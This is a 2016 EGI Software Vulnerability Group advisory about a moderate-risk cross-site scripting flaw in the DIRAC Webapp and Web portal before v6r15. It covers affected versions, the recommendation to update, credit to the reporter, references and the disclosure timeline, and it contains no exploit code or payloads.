Title: EGI SVG Advisory [TLP:WHITE] 'Moderate' Risk: XSS in DIRAC Webapp and
Web portal [EGI-SVG-2016-11107]
Date: 2016-10-21
Updated:
Affected Software and Risk
==========================
Moderate risk vulnerability concerning XSS in DIRAC Webapp and Web portal
Package : DIRAC Webapp and Web portal
Actions Required/Recommended
============================
Sites are recommended to update relevant components, if they have not done so
since
25th August 2016 when the patched version was made available.
Affected software Details.
==========================
Versions of DIRAC prior to v6r15 are affected.
More information
================
The reporter of the vulnerability stated that he was able to carry out an
exploit, where an authenticated user could escalate their privilege.
Component installation information
==================================
See [R 1], Information on the XSS vulnerability is at [R 2]
TLP and URL
===========
** WHITE information - Unlimited distribution **
** see https://go.egi.eu/tlp for distribution restrictions **
URL: https://advisories.egi.eu/Advisory-SVG-2016-11107
Minor updates may be made without re-distribution to the sites
Credit
======
This vulnerability was reported by Simon Fayer from Imperial College, London.
References
==========
[R 1] https://github.com/DIRACGrid/DIRAC/wiki
[R 2] https://github.com/DIRACGrid/WebAppDIRAC/pull/251
Comments
========
Comments or questions should be sent to svg-rat at mailman.egi.eu
If you find or become aware of a vulnerability which is relevant to EGI you may
report it by e-mail to
report-vulnerability at egi.eu
the EGI Software Vulnerability Group will take a look.
Timeline
========
Yyyy-mm-dd [EGI-SVG-2016-11107]
2016-05-17 Vulnerability reported by Simon Fayer who is a member of SVG.
2016-05-17 Software providers responded and involved in investigation
2016-05-18 EGI SVG Risk Assessment completed - discussed at SVG meeting.
2016-05-19 Assessment by the EGI Software Vulnerability Group reported to the
software providers
2016-08-08 Updated packages available on the DIRAC website
2016-10-18 SVG asked whether it has been fixed, confirmed that it was
2016-10-21 Advisory/Alert sent to sites
2016-10-21 Public disclosure
On behalf of the EGI SVG,